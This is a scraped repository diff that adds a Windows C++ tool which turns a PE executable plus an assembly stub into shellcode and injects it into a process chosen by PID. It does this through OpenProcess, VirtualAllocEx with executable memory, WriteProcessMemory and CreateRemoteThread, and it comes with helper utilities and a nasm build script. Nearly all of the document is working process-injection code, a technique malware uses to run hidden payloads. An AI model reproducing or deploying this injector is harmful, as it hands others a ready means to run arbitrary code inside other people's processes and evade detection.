d35ha
diff --git a/Diff for: ‎Utils/Utils.cpp
+98 b/Diff for: ‎Utils/Utils.cpp
+98
diff --git a/Diff for: ‎Utils/Utils.h
+19 b/Diff for: ‎Utils/Utils.h
+19
diff --git a/Diff for: ‎bins/pe_to_shellcode32.exe
11 KB b/Diff for: ‎bins/pe_to_shellcode32.exe
11 KB
diff --git a/Diff for: ‎bins/pe_to_shellcode64.exe
13 KB b/Diff for: ‎bins/pe_to_shellcode64.exe
13 KB
diff --git a/Diff for: ‎pe_to_shellcode_injector.cpp
+159 b/Diff for: ‎pe_to_shellcode_injector.cpp
+159
diff --git a/Diff for: ‎stub/make.bat
+2 b/Diff for: ‎stub/make.bat
+2
@@ -0,0 +1,98 @@
+#include "Utils.h"
+
+#pragma comment (lib, "ntdll.lib")
+
+#define CONSOLE_COLOR_GREEN		0xA
+#define CONSOLE_COLOR_YELLOW	0xE
+#define CONSOLE_COLOR_RED		0xC
+#define CONSOLE_COLOR_WHITE		0x7
+
+HANDLE hConsole = NULL;
+CHAR ErrorMsg[MAX_PATH] = { 0 };
+
+BOOL printf_success(LPCSTR _Format, ...)
+{
+	if (!hConsole) hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
+	va_list ArgList = NULL;
+	va_start(ArgList, _Format);
+	SetConsoleTextAttribute(hConsole, CONSOLE_COLOR_GREEN);
+	printf("[+] ");
+	vprintf(_Format, ArgList);
+	SetConsoleTextAttribute(hConsole, CONSOLE_COLOR_WHITE);
+	va_end(ArgList);
+	return TRUE;
+};
+
+BOOL printf_info(LPCSTR _Format, ...)
+{
+	if (!hConsole) hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
+	va_list ArgList = NULL;
+	va_start(ArgList, _Format);
+	SetConsoleTextAttribute(hConsole, CONSOLE_COLOR_YELLOW);
+	printf("[!] ");
+	vprintf(_Format, ArgList);
+	SetConsoleTextAttribute(hConsole, CONSOLE_COLOR_WHITE);
+	va_end(ArgList);
+	return TRUE;
+};
+
+BOOL printf_error(LPCSTR _Format, ...)
+{
+	if (!hConsole) hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
+	va_list ArgList = NULL;
+	va_start(ArgList, _Format);
+	SetConsoleTextAttribute(hConsole, CONSOLE_COLOR_RED);
+	printf("[-] ");
+	vprintf(_Format, ArgList);
+	SetConsoleTextAttribute(hConsole, CONSOLE_COLOR_WHITE);
+	va_end(ArgList);
+	return TRUE;
+};
+
+LPCSTR GetLastErrorFormat(ULONG dwErrorCode)
+{
+	if (dwErrorCode == -1) dwErrorCode = GetLastError();
+	if (!FormatMessageA(
+		FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
+		NULL,
+		dwErrorCode,
+		MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
+		ErrorMsg,
+		sizeof(ErrorMsg),
+		NULL))
+	{
+		printf_error("Error at getting the last error format of code 0x%lx\n", dwErrorCode);
+		sprintf_s(ErrorMsg, "0x%lx", dwErrorCode);
+	};
+	return ErrorMsg;
+};
+
+LPCSTR GetNtStatusFormat(NTSTATUS ntCode)
+{
+	ULONG dwErrorCode = RtlNtStatusToDosError(ntCode);
+	if (dwErrorCode == ERROR_MR_MID_NOT_FOUND)
+	{
+		printf_error("Error at getting the error code of ntstatus 0x%lx\n", ntCode);
+		sprintf_s(ErrorMsg, "0x%lx", dwErrorCode);
+		return ErrorMsg;
+	};
+	return GetLastErrorFormat(dwErrorCode);
+};
+
+BOOL ReportBadPE(LPCSTR lpErrorStr)
+{
+	printf_error("Invalid or unsupported PE file, %s\n", lpErrorStr);
+	return TRUE;
+};
+
+BOOL ReportApiError(LPCSTR szApiName, LPCSTR szMsg)
+{
+	printf_error("Error at %s, %s, error code/msg = %s\n", szApiName, szMsg, GetLastErrorFormat(GetLastError()));
+	return TRUE;
+};
+
+BOOL ReportNtStastus(LPCSTR szApiName, NTSTATUS NtCode, LPCSTR szMsg)
+{
+	printf_error("Error at %s, %s, status code/msg = %s\n", szApiName, szMsg, GetNtStatusFormat(NtCode));
+	return TRUE;
+};
@@ -0,0 +1,19 @@
+#include <windows.h>
+#include <winternl.h>
+#include <stdio.h>
+
+#ifdef __GNUC__
+#define offsetof(type, member)  __builtin_offsetof (type, member)
+#endif
+
+#define GET_DIRECTORY_ENTRY(lpNtHeader, dwEntry) lpNtHeader->OptionalHeader.DataDirectory[dwEntry].VirtualAddress
+#define GET_DIRECTORY_SIZE(lpNtHeader, dwEntry) lpNtHeader->OptionalHeader.DataDirectory[dwEntry].Size
+
+LPCSTR GetNtStatusFormat(NTSTATUS ntCode);
+LPCSTR GetLastErrorFormat(ULONG dwErrorCode = -1);
+BOOL printf_error(LPCSTR _Format, ...);
+BOOL printf_info(LPCSTR _Format, ...);
+BOOL printf_success(LPCSTR _Format, ...);
+BOOL ReportBadPE(LPCSTR lpErrorStr);
+BOOL ReportApiError(LPCSTR szApiName, LPCSTR szMsg);
+BOOL ReportNtStastus(LPCSTR szApiName, NTSTATUS NtCode, LPCSTR szMsg);
@@ -0,0 +1,159 @@
+#include "Utils/Utils.h"
+
+INT main(INT argc, CHAR** argv) {
+
+	if (argc > 3)
+	{
+		LPCSTR szPeFile = argv[1];
+		LPCSTR szStubFile = argv[2];
+		DWORD dwPid = atoi(argv[3]);
+
+		HANDLE hStubFile = NULL;
+		if (!(hStubFile = CreateFileA(
+			szStubFile,
+			GENERIC_READ,
+			0,
+			NULL,
+			OPEN_EXISTING,
+			FILE_ATTRIBUTE_NORMAL,
+			NULL
+		)) || INVALID_HANDLE_VALUE == hStubFile)
+		{
+			ReportApiError("CreateFileA", "cannot open the supplied stub file");
+			return FALSE;
+		};
+
+		HANDLE hExeFile = NULL;
+		if (!(hExeFile = CreateFileA(
+			szPeFile,
+			GENERIC_READ,
+			0,
+			NULL,
+			OPEN_EXISTING,
+			FILE_ATTRIBUTE_NORMAL,
+			NULL
+		)) || INVALID_HANDLE_VALUE == hExeFile)
+		{
+			ReportApiError("CreateFileA", "cannot open the supplied exe file");
+			return FALSE;
+		};
+
+		LARGE_INTEGER u32StubSize;
+		if (!GetFileSizeEx(
+			hStubFile,
+			&u32StubSize
+		))
+		{
+			ReportApiError("GetFileSizeEx", "cannot get the size of the supplied stub file");
+			return FALSE;
+		};
+
+		LARGE_INTEGER u32ExeSize;
+		if (!GetFileSizeEx(
+			hExeFile,
+			&u32ExeSize
+		))
+		{
+			ReportApiError("GetFileSizeEx", "cannot get the size of the supplied exe file");
+			return FALSE;
+		};
+
+		LPVOID lpShellcode = NULL;
+		if (!(lpShellcode = VirtualAlloc(
+			NULL,
+			(SIZE_T)(u32StubSize.QuadPart + u32ExeSize.QuadPart),
+			(MEM_COMMIT | MEM_RESERVE),
+			PAGE_READWRITE
+		)))
+		{
+			ReportApiError("VirtualAlloc", "cannot allocate memory for the shellcode");
+			return FALSE;
+		};
+
+		DWORD dwReadBytes = 0;
+		if (!ReadFile(
+			hStubFile,
+			lpShellcode,
+			(DWORD)u32StubSize.QuadPart,
+			&dwReadBytes,
+			NULL
+		) || dwReadBytes != u32StubSize.QuadPart)
+		{
+			ReportApiError("ReadFile", "cannot read the stub file");
+			return FALSE;
+		};
+
+		if (!ReadFile(
+			hExeFile,
+#if defined(_M_X64) || defined(__amd64__)
+			(LPVOID)((ULONGLONG)lpShellcode + dwReadBytes),
+#else
+			(LPVOID)((ULONGLONG)lpShellcode + dwReadBytes),
+#endif
+			(DWORD)u32ExeSize.QuadPart,
+			&dwReadBytes,
+			NULL
+		) || dwReadBytes != u32ExeSize.QuadPart)
+		{
+			ReportApiError("ReadFile", "cannot read the exe file");
+			return FALSE;
+		};
+
+		HANDLE hProcess = NULL;
+		if (!(hProcess = OpenProcess(
+			PROCESS_ALL_ACCESS,
+			FALSE,
+			dwPid
+		)))
+		{
+			ReportApiError("OpenProcess", "cannot open the target pid");
+			return FALSE;
+		};
+
+		LPVOID lpAllocatedBase = NULL;
+		if (!(lpAllocatedBase = VirtualAllocEx(
+			hProcess,
+			NULL,
+			(SIZE_T)(u32StubSize.QuadPart + u32ExeSize.QuadPart),
+			(MEM_COMMIT | MEM_RESERVE),
+			PAGE_EXECUTE_READWRITE
+		)))
+		{
+			ReportApiError("VirtualAllocEx", "cannot allocate at the remote process for the shellcode");
+			return FALSE;
+		};
+
+		SIZE_T stWrittenBytes = 0;
+		if (!WriteProcessMemory(
+			hProcess,
+			lpAllocatedBase,
+			lpShellcode,
+			(SIZE_T)(u32StubSize.QuadPart + u32ExeSize.QuadPart),
+			&stWrittenBytes
+		) || stWrittenBytes != u32StubSize.QuadPart + u32ExeSize.QuadPart)
+		{
+			ReportApiError("WriteProcessMemory", "cannot write at the remote process");
+			return FALSE;
+		};
+
+		if (!CreateRemoteThread(
+			hProcess,
+			NULL,
+			0,
+			(LPTHREAD_START_ROUTINE)lpAllocatedBase,
+			NULL,
+			0,
+			NULL
+		))
+		{
+			ReportApiError("CreateRemoteThread", "cannot create a new thread at the remote process");
+			return FALSE;
+		};
+		CloseHandle(hProcess);
+	}
+	else
+	{
+		printf("%s [exe] [stub] [pid]\n", argv[0]);
+	}
+	return TRUE;
+}
@@ -0,0 +1,2 @@
+nasm -o stub_X32.bin -f bin stub_x32.asm
+nasm -o stub_X64.bin -f bin stub_x64.asm
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,2 @@`
	`1`	`+nasm -o stub_X32.bin -f bin stub_x32.asm`
	`2`	`+nasm -o stub_X64.bin -f bin stub_x64.asm`